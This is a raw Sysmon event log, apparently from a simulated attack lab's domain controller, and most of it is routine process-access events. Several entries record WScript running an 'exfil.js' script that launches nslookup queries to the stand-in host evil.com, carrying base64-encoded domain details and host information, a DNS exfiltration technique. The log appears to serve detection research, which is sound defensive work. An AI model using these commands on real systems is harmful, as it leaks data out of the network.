14:16:18.804{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.804{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-FB3E-000000005F02}7992C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.804{2E1864BB-17A1-629A-783D-000000005F02}55526052C:\Windows\System32\WScript.exe{2E1864BB-17B2-629A-FB3E-000000005F02}7992C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.815{2E1864BB-17B2-629A-FB3E-000000005F02}7992C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqted.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.804{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlupqhx.tmpMD5=7564BBC357DA8472A939C2EE79A792F5,SHA256=2DBE8B361679ED57394E9EFB1DF40D5559A7E60F6F1F0A6E2904E60B52067C41,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.782{2E1864BB-17B2-629A-F93E-000000005F02}6388660C:\Windows\system32\conhost.exe{2E1864BB-17B2-629A-FA3E-000000005F02}3736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.766{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.766{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.766{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.766{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.766{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-FA3E-000000005F02}3736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.766{2E1864BB-17B2-629A-F83E-000000005F02}72644812C:\Windows\system32\cmd.exe{2E1864BB-17B2-629A-FA3E-000000005F02}3736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.780{2E1864BB-17B2-629A-FA3E-000000005F02}3736C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B2-629A-F83E-000000005F02}7264C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlupqhx.tmp 2>&1 10341000x8000000000000000196967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.751{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B2-629A-F93E-000000005F02}6388C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.751{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B2-629A-F93E-000000005F02}6388C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.751{2E1864BB-17B2-629A-F93E-000000005F02}6388660C:\Windows\system32\conhost.exe{2E1864BB-17B2-629A-F83E-000000005F02}7264C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.735{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-F93E-000000005F02}6388C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.735{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.735{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.735{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.735{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.735{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-F83E-000000005F02}7264C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.735{2E1864BB-17A1-629A-783D-000000005F02}55526488C:\Windows\System32\WScript.exe{2E1864BB-17B2-629A-F83E-000000005F02}7264C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.738{2E1864BB-17B2-629A-F83E-000000005F02}7264C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlupqhx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.719{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmix.tmpMD5=13DAE9C9CF6ADD4F8F46BEAD8C3CC212,SHA256=2DEC16DD493989E01C6A3048EE3C7ECCED532832FC7BFFA4BF3297D9C89C0784,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.704{2E1864BB-17B2-629A-F63E-000000005F02}74764536C:\Windows\system32\conhost.exe{2E1864BB-17B2-629A-F73E-000000005F02}5392C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.704{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-F73E-000000005F02}5392C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.704{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.704{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.704{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.704{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 